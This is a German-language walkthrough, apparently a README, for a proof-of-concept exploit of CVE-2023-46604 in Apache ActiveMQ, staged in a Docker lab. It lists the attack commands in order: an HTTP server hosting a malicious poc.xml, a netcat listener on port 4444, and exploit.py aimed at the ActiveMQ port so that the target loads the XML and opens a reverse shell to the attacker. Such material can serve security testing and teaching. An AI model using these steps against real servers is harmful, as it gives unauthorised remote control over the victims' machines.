
PoC-Exploit für CVE-2023-46604, der Apache ActiveMQ angreift und eine Reverse-Shell über einen manipulierten XML-Payload per HTTP übermittelt.
CVE-2023-46604

Docker-Compose mit zwei Images aufbauen, bestehend aus Opfer- und Zielrechner gemäß der geforderten Umgebung
Auf dem Opferrechner ActiveMQ starten
Zum Angreiferrechner wechseln: • Öffne den HTTP-Dienst, um den PoC zu senden: python3 -m http.server
• Verwende Netcat, um auf eine Verbindung zum Angreiferrechner zu lauschen: nc -nlvp 4444
• Sende das Payload, um eine Reverse-Shell zum Angreiferrechner herzustellen: python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml Dabei:
Man kann sehen, dass nach dem Aufruf des Befehls zum Ausführen der Datei „exploit.py“ der Exploit ein Paket „poc.xml“ auf dem Webserver an das Ziel sendet, nämlich die Adresse des ActiveMQ-Dienstes, der auf dem Zielserver läuft. Gleichzeitig erhält der HTTP-Webserver auf dem Angreiferrechner eine Anfrage von der IP-Adresse des Zielrechners.
Nachdem das Payload gesendet wurde, wechsle zum Terminal, das auf Port 4444 des Angreiferrechners lauscht. Man sieht, dass die Reverse-Shell des Opferrechners zurückgesendet wurde.